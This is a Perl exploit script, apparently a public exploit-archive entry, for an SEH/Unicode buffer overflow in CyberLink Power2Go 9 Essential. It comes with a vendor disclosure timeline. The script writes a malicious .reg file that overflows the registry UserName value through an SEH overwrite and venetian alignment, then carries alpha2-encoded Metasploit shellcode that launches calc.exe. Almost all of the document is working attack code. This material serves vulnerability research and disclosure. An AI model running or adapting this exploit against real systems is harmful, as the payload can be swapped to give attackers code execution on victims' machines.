#!/usr/bin/perl ###################################################################################################### # Exploit Title: CyberLink Power2Go Essential 9.0.1002.0 - Registry SEH/Unicode Buffer Overflow # Discovery date: 11-26-2013 # Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift # Vulnerable Software/Version: CyberLink Power2Go 9 Essential 9.0.1002.0 # Vendor Site: http://www.cyberlink.com/ # Tested On: Windows XP SP3 # Timeline: # -- 11/28/13: Initial contact to vendor requesting appropriate POC to provide vuln details # -- 12/03/13: Received appropriate submission POC, initial vuln details provided to vendor # -- 12/11/13: Vendor response indicating issue has been escalated to Development team # -- 12/17/13: Vendor response indicating RD team working on fix # -- 03/05/14: Requested status from vendor who indicated issue has been re-escalated to Development # -- 03/07/13: Vendor response indicating someone from Development would contact for more details # -- 03/07/14: Vendor response indicating product team working on fix, new release scheduled 3/28 # -- 03/16/14: Additional details provided to vendor as requested # -- 04/06/14: Status update requested from vendor # -- 04/08/14: New build released, provided for testing; confirmed fix for this issue # Details: # -- Power2Go uses registry keys to set various attributes including the registered username # -- The registered username is loaded into memory for display when the "About" screen is opened # -- These registry values can be found here: HKEY_LOCAL_MACHINE\SOFTWARE\CyberLink\Power2Go9\9.0 # -- It loads these values into memory without proper bounds checks which enables the exploit # To Exploit: # -- 1) Run created .reg file 2) Open Power2Go 3) Click on Power2Go Logo in the upper left corner # -- Once the registry has been modified, this exploit will be persistent and execute every time # -- the application is run and the "About" screen is opened ###################################################################################################### my $buffsize = 50000; # sets buffer size for consistent sized payload # construct the required start and end of the reg file my $regfilestart ="Windows Registry Editor Version 5.00\n\n"; $regfilestart = $regfilestart . "[HKEY_LOCAL_MACHINE\\SOFTWARE\\CyberLink\\Power2Go9\\9.0]\n"; $regfilestart = $regfilestart . "\"UserName\"="; # The UserName field is vulnerable my $junk = "T_v3rn1x" . ("\x41" x 4892); # offset to next seh my $nseh = "\x61\x62"; # overwrite next seh with popad + nop my $seh = "\xd0\x50"; # overwrite seh with unicode friendly pop pop ret # unicode venetian alignment my $venalign = "\x6e"; $venalign = $venalign . "\x53"; # push ebx; ebx is the register closest to our shellcode following the popad $venalign = $venalign . "\x6e"; # venetian pad/align $venalign = $venalign . "\x58"; # pop eax; put ebx into eax and modify to jump to our shellcode (200 bytes) $venalign = $venalign . "\x6e"; # venetian pad/align $venalign = $venalign . "\x05\x14\x11"; # add eax,0x11001400 $venalign = $venalign . "\x6e"; # venetian pad/align $venalign = $venalign . "\x2d\x12\x11"; # sub eax,0x11001200 $venalign = $venalign . "\x6e"; # venetian pad/align $venalign = $venalign . "\x50"; # push eax $venalign = $venalign . "\x6e"; # venetian pad/align $venalign = $venalign . "\xc3"; # ret my $nops = "\x71" x 236; # some unicode friendly filler before the shellcode # Calc.exe payload # msfpayload windows/exec CMD=calc.exe R # alpha2 unicode/uppercase my $shell = "PPYAIAIAIAIAQATAXAZAPA3QADAZA". "BARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA". "58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABAB". "AB30APB944JBKLK8U9M0M0KPS0U99UNQ8RS44KPR004K". "22LLDKR2MD4KCBMXLOGG0JO6NQKOP1WPVLOLQQCLM2NL". "MPGQ8OLMM197K2ZP22B7TK0RLPTK12OLM1Z04KOPBX55". "Y0D4OZKQXP0P4KOXMHTKR8MPKQJ3ISOL19TKNTTKM18V". "NQKONQ90FLGQ8OLMKQY7NXK0T5L4M33MKHOKSMND45JB". "R84K0XMTKQHSBFTKLL0KTK28MLM18S4KKT4KKQXPSYOT". "NDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM2JKQTMSU". "89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU7MEM". "KOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERC". "QQ2LRCM0LJA"; my $sploit = $junk.$nseh.$seh.$venalign.$nops.$shell; # assemble the exploit portion of the buffer my $fill = "\x71" x ($buffsize - length($sploit)); # fill remainder of buffer with junk my $buffer = $sploit.$fill; # assemble the final buffer my $regfile = $regfilestart . "hex: " . $buffer . $regfileend; # construct the reg file with hex payload to generate binary registry entry my $regfile = $regfilestart . "\"". $buffer . "\""; # write the exploit buffer to file my $file = "cyberlinkp2g9_bof.reg"; open(FILE, ">$file"); print FILE $regfile; close(FILE); print "Exploit file [" . $file . "] created\n"; print "Buffer size: " . length($buffer) . "\n";